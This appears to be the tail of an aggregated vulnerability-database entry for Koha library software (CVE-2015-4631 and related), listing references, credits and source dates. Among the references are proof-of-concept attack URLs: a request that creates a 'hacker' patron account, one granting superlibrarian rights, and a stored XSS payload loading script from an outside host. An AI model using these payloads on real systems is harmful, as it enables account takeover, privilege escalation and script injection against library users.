url:http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10

Trust: 0.1

url:http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&b_address=&b_address2=&b_city=&b_state=&b_zipcode=&b_country=&b_phone=&b_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&borrowermandatoryfield=surname%7cdateofbirth%7ccardnumber%7caddress&category_type=a&updtype=i&op=insert&surname=hacker&dateofbirth=10%2f06%2f2000&address=fictional&select_city=%7c%7c%7c&cardnumber=9182734629182364&branchcode=maures&categorycode=p_com&dateenrolled=24%2f06%2f2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=profession&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=save&setting_extended_patron_attributes=1

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-4632

Trust: 0.1

url:http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian

Trust: 0.1

url:http://wiki.koha-community.org/wiki/sql_reports_library#superlibrarians

Trust: 0.1

url:http://www.koha-community.org/

Trust: 0.1

url:http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl

Trust: 0.1

url:http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=malicious+input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-4633

Trust: 0.1

url:http://sqlmap.org

Trust: 0.1

sources: CNVD: CNVD-2015-05198 // CNVD: CNVD-2015-05201 // CNVD: CNVD-2015-05199 // CNVD: CNVD-2015-05200 // CNVD: CNVD-2015-05197 // BID: 75426 // JVNDB: JVNDB-2015-008219 // PACKETSTORM: 132458 // CNNVD: CNNVD-201512-696 // NVD: CVE-2015-4631

CREDITS

Raschin Ghanad-Tavakoli

Trust: 0.9

sources: BID: 75426 // CNNVD: CNNVD-201512-696

SOURCES

db:IVDid:70a561b4-1e6e-11e6-abef-000c29c66e3d
db:IVDid:72631f14-1e6e-11e6-abef-000c29c66e3d
db:IVDid:747c9c94-1e6e-11e6-abef-000c29c66e3d
db:IVDid:182e31fa-1e6e-11e6-abef-000c29c66e3d
db:IVDid:1ad25ddc-1e6e-11e6-abef-000c29c66e3d
db:CNVDid:CNVD-2015-05198
db:CNVDid:CNVD-2015-05201
db:CNVDid:CNVD-2015-05199
db:CNVDid:CNVD-2015-05200
db:CNVDid:CNVD-2015-05197
db:BIDid:75426
db:JVNDBid:JVNDB-2015-008219
db:PACKETSTORMid:132458
db:CNNVDid:CNNVD-201512-696
db:NVDid:CVE-2015-4631

LAST UPDATE DATE

2024-11-23T21:52:48.282000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2015-05198date:2015-08-12T00:00:00
db:CNVDid:CNVD-2015-05201date:2015-08-12T00:00:00
db:CNVDid:CNVD-2015-05199date:2015-08-12T00:00:00
db:CNVDid:CNVD-2015-05200date:2015-08-12T00:00:00
db:CNVDid:CNVD-2015-05197date:2015-08-12T00:00:00
db:BIDid:75426date:2015-06-25T00:00:00
db:JVNDBid:JVNDB-2015-008219date:2019-01-09T00:00:00
db:CNNVDid:CNNVD-201512-696date:2018-11-27T00:00:00
db:NVDid:CVE-2015-4631date:2024-11-21T02:31:26.413

SOURCES RELEASE DATE

db:IVDid:70a561b4-1e6e-11e6-abef-000c29c66e3ddate:2015-08-12T00:00:00
db:IVDid:72631f14-1e6e-11e6-abef-000c29c66e3ddate:2015-08-12T00:00:00
db:IVDid:747c9c94-1e6e-11e6-abef-000c29c66e3ddate:2015-08-12T00:00:00
db:IVDid:182e31fa-1e6e-11e6-abef-000c29c66e3ddate:2015-08-12T00:00:00
db:IVDid:1ad25ddc-1e6e-11e6-abef-000c29c66e3ddate:2015-08-12T00:00:00
db:CNVDid:CNVD-2015-05198date:2015-08-12T00:00:00
db:CNVDid:CNVD-2015-05201date:2015-08-12T00:00:00
db:CNVDid:CNVD-2015-05199date:2015-08-12T00:00:00
db:CNVDid:CNVD-2015-05200date:2015-08-12T00:00:00
db:CNVDid:CNVD-2015-05197date:2015-08-12T00:00:00
db:BIDid:75426date:2015-06-25T00:00:00
db:JVNDBid:JVNDB-2015-008219date:2019-01-09T00:00:00
db:PACKETSTORMid:132458date:2015-06-26T23:02:22
db:CNNVDid:CNNVD-201512-696date:2015-06-25T00:00:00
db:NVDid:CVE-2015-4631date:2018-10-18T21:29:00.723